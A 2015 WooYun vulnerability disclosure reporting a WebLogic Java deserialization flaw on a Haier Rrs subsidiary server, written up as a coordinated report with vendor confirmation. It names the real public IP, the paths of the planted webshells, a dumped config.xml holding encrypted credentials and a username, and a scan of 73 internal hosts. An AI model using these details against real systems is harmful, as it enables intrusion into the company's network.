当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164061

漏洞标题:海尔旗下日日顺某分站存在JAVA反序列化漏洞#第二弹(可内网渗透73台机器/几乎所有系统都涉及到)

相关厂商:海尔集团

漏洞作者: 路人甲

提交时间:2015-12-24 09:54

修复时间:2016-02-06 10:45

公开时间:2016-02-06 10:45

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-24: 细节已通知厂商并且等待厂商处理中
2015-12-24: 厂商已经确认,细节仅向厂商公开
2016-01-03: 细节向核心白帽子及相关领域专家公开
2016-01-13: 细节向普通白帽子公开
2016-01-23: 细节向实习白帽子公开
2016-02-06: 细节向公众公开

简要描述:

雷欧

详细说明:

http://27.223.70.113:7003/mainFrame.html
存在weblogic的反序列化漏洞
直接上工具吧
就不反弹了

1.jpg


查看下配置信息
cat config/config.xml

<?xml version='1.0' encoding='UTF-8'?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
<name>zhwlpt_domain</name>
<domain-version>10.3.6.0</domain-version>
<security-configuration>
<name>zhwlpt_domain</name>
<realm>
<sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider>
<sec:authentication-provider xsi:type="wls:default-identity-asserterType">
<sec:active-type>AuthenticatedUser</sec:active-type>
</sec:authentication-provider>
<sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper>
<sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer>
<sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator>
<sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper>
<sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider>
<sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>
<sec:name>myrealm</sec:name>
<sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">
<sec:name>SystemPasswordValidator</sec:name>
<pas:min-password-length>8</pas:min-password-length>
<pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>
</sec:password-validator>
</realm>
<default-realm>myrealm</default-realm>
<credential-encrypted>{AES}8Gslv9DTeozRmJFQt9bkl1S0OeHNpDnmil1nx82e3xVSeBS2EoVMB8ICAZE52UZV2klWydswwH8AcN0nR1x6/kUMy0/9rEFQ2Dt8zin7Hs12wpaWhzfJlofjlFC8GXDV</credential-encrypted>
<node-manager-username>esSSMG8U26</node-manager-username>
<node-manager-password-encrypted>{AES}zJAMkb+1wyAI44ZNflvAI0KHhNm//5AG4/Gk9VYM0Fk=</node-manager-password-encrypted>
</security-configuration>
<server>
<name>zhwlpt_admin</name>
<log>
<number-of-files-limited>true</number-of-files-limited>
<file-count>10</file-count>
</log>
<web-server>
<web-server-log>
<number-of-files-limited>true</number-of-files-limited>
<file-count>10</file-count>
</web-server-log>
</web-server>
<listen-address>10.135.108.88</listen-address>
</server>
<server>
<name>zhwlpt_app1</name>
<log>
<number-of-files-limited>true</number-of-files-limited>
<file-count>10</file-count>
</log>
<machine>zhwlptapp02</machine>
<listen-port>7003</listen-port>
<cluster>zhwlpt_cluster</cluster>
<web-server>
<web-server-log>
<number-of-files-limited>true</number-of-files-limited>
<file-count>10</file-count>
</web-server-log>
</web-server>
<listen-address>10.135.108.88</listen-address>
<server-start>
<arguments>-server -Xms4096m -Xmx4096m -XX:PermSize=512m -XX:MaxPermSize=1024m -Dfile.encoding=UTF-8</arguments>
</server-start>
<jta-migratable-target>
<user-preferred-server>zhwlpt_app1</user-preferred-server>
<cluster>zhwlpt_cluster</cluster>
</jta-migratable-target>
</server>
<server>
<name>zhwlpt_app2</name>
<log>
<number-of-files-limited>true</number-of-files-limited>
<file-count>10</file-count>
</log>
<machine>zhwlptapp03</machine>
<listen-port>7003</listen-port>
<cluster>zhwlpt_cluster</cluster>
<web-server>
<web-server-log>
<number-of-files-limited>true</number-of-files-limited>
<file-count>10</file-count>
</web-server-log>
</web-server>
<listen-address>10.135.108.89</listen-address>
<server-start>
<arguments>-server -Xms4096m -Xmx4096m -XX:PermSize=512m -XX:MaxPermSize=1024m -Dfile.encoding=UTF-8</arguments>
</server-start>
<jta-migratable-target>
<user-preferred-server>zhwlpt_app2</user-preferred-server>
<cluster>zhwlpt_cluster</cluster>
</jta-migratable-target>
</server>
<cluster>
<name>zhwlpt_cluster</name>
<cluster-messaging-mode>unicast</cluster-messaging-mode>
</cluster>
<production-mode-enabled>true</production-mode-enabled>
<embedded-ldap>
<name>zhwlpt_domain</name>
<credential-encrypted>{AES}sTjZUzYFaEh9LETOqcVQwfjTmMS2A5HwoyGjFu0pydtq4OfKSdcFh4fqgs8sRlg7</credential-encrypted>
</embedded-ldap>
<configuration-version>10.3.6.0</configuration-version>
<app-deployment>
<name>opms</name>
<target>zhwlpt_cluster,zhwlpt_admin</target>
<module-type>war</module-type>
<source-path>servers/zhwlpt_admin/upload/opms.war</source-path>
<security-dd-model>DDOnly</security-dd-model>
</app-deployment>
<app-deployment>
<name>opms_edi</name>
<target>zhwlpt_cluster,zhwlpt_admin</target>
<module-type>war</module-type>
<source-path>servers/zhwlpt_admin/upload/opms_edi.war</source-path>
<security-dd-model>DDOnly</security-dd-model>
</app-deployment>
<machine>
<name>zhwlptapp02</name>
<node-manager>
<listen-address>10.135.108.88</listen-address>
</node-manager>
</machine>
<machine>
<name>zhwlptapp03</name>
<node-manager>
<listen-address>10.135.108.89</listen-address>
</node-manager>
</machine>
<migratable-target>
<name>zhwlpt_app1 (migratable)</name>
<notes>This is a system generated default migratable target for a server. Do not delete manually.</notes>
<user-preferred-server>zhwlpt_app1</user-preferred-server>
<cluster>zhwlpt_cluster</cluster>
</migratable-target>
<migratable-target>
<name>zhwlpt_app2 (migratable)</name>
<notes>This is a system generated default migratable target for a server. Do not delete manually.</notes>
<user-preferred-server>zhwlpt_app2</user-preferred-server>
<cluster>zhwlpt_cluster</cluster>
</migratable-target>
<admin-server-name>zhwlpt_admin</admin-server-name>
<jdbc-system-resource>
<name>opmsJndi</name>
<target>zhwlpt_cluster,zhwlpt_admin</target>
<descriptor-file-name>jdbc/opmsJndi-8144-jdbc.xml</descriptor-file-name>
</jdbc-system-resource>
</domain>


成功拿到shell
http://27.223.70.113:7003/uddiexplorer/1ss.jsp?o=index
探测下内网
http://27.223.70.113:7003/uddiexplorer/out.jsp
再次沦陷73台机器

3.jpg


http://10.135.108.16 >> 海尔翻译管理平台>>Apache-Coyote/1.1 >>Success
http://10.135.108.21 >> >>Apache/2.2.22 (Win32) mod_jk/1.2.30 >>Success
http://10.135.108.29 >> nginx>>nginx >>Success
http://10.135.108.37 >> >>Apache-Coyote/1.1 >>Success
http://10.135.108.36 >> >>Apache-Coyote/1.1 >>Success
http://10.135.108.38 >> >>Apache-Coyote/1.1 >>Success
http://10.135.108.93 >> 海尔微信公众号后台管理系统>>nginx/1.7.9 >>Success
http://10.135.108.64 >> Welcome to nginx!>>nginx/1.8.0 >>Success
http://10.135.108.65 >> Welcome to nginx!>>nginx/1.8.0 >>Success
http://10.135.108.87 >> haier>>Microsoft-IIS/6.0 >>Success
http://10.135.108.135 >> >>unknow >>Success
http://10.135.108.35 >> >>Jetty(8.1.15.v20140411) >>Success
http://10.135.108.40 >> 海尔B2B首页>>Apache-Coyote/1.1 >>Success
http://10.135.108.95 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.94 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.159 >> >>nginx/1.2.7 >>Success
http://10.135.108.160 >> HOPE>>nginx >>Success
http://10.135.108.117 >> >>Apache/2.2.21 (Unix) >>Success
http://10.135.108.157 >> 移动办公平台 >>MAM Server 1.0 >>Success
http://10.135.108.158 >> Welcome to nginx!>>nginx/1.5.13 >>Success
http://10.135.108.162 >> 登录>>Apache-Coyote/1.1 >>Success
http://10.135.108.18 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.19 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.178 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.179 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.12 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.107 >> Loading Portal...>>SAP J2EE Engine/7.00 >>Success
http://10.135.108.126 >> 云菜网云菜网>>null >>Success
http://10.135.108.148 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.50 >> 巨商汇_海尔店铺>>Apache-Coyote/1.1 >>Success
http://10.135.108.155 >> 海尔工业品商城>>Apache/2.4.6 (Unix) OpenSSL/1.0.1c mod_jk/1.2.37 >>Success
http://10.135.108.188 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.55 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.14 >> >>Apache/2.4.6 (Unix) OpenSSL/1.0.1g mod_jk/1.2.37 >>Success
http://10.135.108.49 >> 巨商汇_海尔店铺>>Apache-Coyote/1.1 >>Success
http://10.135.108.197 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.198 >> SCRM应用平台导航页>>nginx/1.4.4 >>Success
http://10.135.108.204 >> Welcome to nginx!>>nginx/1.6.1 >>Success
http://10.135.108.13 >> >>Apache/2.4.6 (Unix) OpenSSL/1.0.1g mod_jk/1.2.37 >>Success
http://10.135.108.199 >> ��ӭʹ���Ű�����Ӧ�ð�ȫ���>>Apache Coyote/1.0 >>Success
http://10.135.108.110 >> �����׼��Ϣ����ϵͳ>>Microsoft-IIS/6.0 >>Success
http://10.135.108.208 >> Login>>Lotus-Domino >>Success
http://10.135.108.200 >> 海尔互联网网站建设服务版块>>Apache-Coyote/1.1 >>Success
http://10.135.108.146 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.180 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.140 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.231 >> 海尔人才雷达:人才搜索>>Apache-Coyote/1.1 >>Success
http://10.135.108.232 >> 海客会-海尔·智慧社区生活服务平台>>null >>Success
http://10.135.108.235 >> WebSphere Application Server Version V8.5 Liberty Profile200 OK>>nginx/1.6.1 >>Success
http://10.135.108.201 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.132 >> 运行时错误>>Microsoft-IIS/7.0 >>Success
http://10.135.108.138 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.20 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.62 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.215 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.241 >> Loading Portal...>>SAP J2EE Engine/7.00 >>Success
http://10.135.108.249 >> Welcome to nginx!>>nginx >>Success
http://10.135.108.250 >> Welcome to nginx!>>nginx >>Success
http://10.135.108.252 >> Welcome to nginx!>>nginx >>Success
http://10.135.108.22 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.206 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.221 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.246 >> >>nginx/1.6.0 >>Success
http://10.135.108.17 >> IIS7>>Microsoft-IIS/7.0 >>Success
http://10.135.108.211 >> 海尔企业客户采购|海尔商用解决方案-海尔B2B智慧集成解决方案平台>>Apache-Coyote/1.1 >>Success
http://10.135.108.209 >> >>Microsoft-IIS/6.0 >>Success
http://10.135.108.118 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.81 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.181 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.10 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.212 >> 海尔企业客户采购|海尔商用解决方案-海尔B2B智慧集成解决方案平台>>Apache/2.4.7 (Unix) PHP/5.3.27 >>Success
http://10.135.108.61 >> M-lab创客实验室beta版>>Microsoft-IIS/7.5 >>Success
http://10.135.108.169 >> >>Microsoft-IIS/7.5 >>Success
http://10.135.108.133 >> 海尔二维码管理平台>>Microsoft-IIS/7.0 >>Success
http://10.135.108.11 >> 首页 - 海尔文化交互平台>>Microsoft-IIS/7.0 >>Success
http://10.135.108.90 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://10.135.108.113 >> >>Microsoft-IIS/7.5 >>Success


漏洞证明:

4.jpg


5.jpg

修复方案:

升级

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-24 15:32

厂商回复:

感谢白帽子的测试与提醒,已安排人员进行处理。

最新状态:

暂无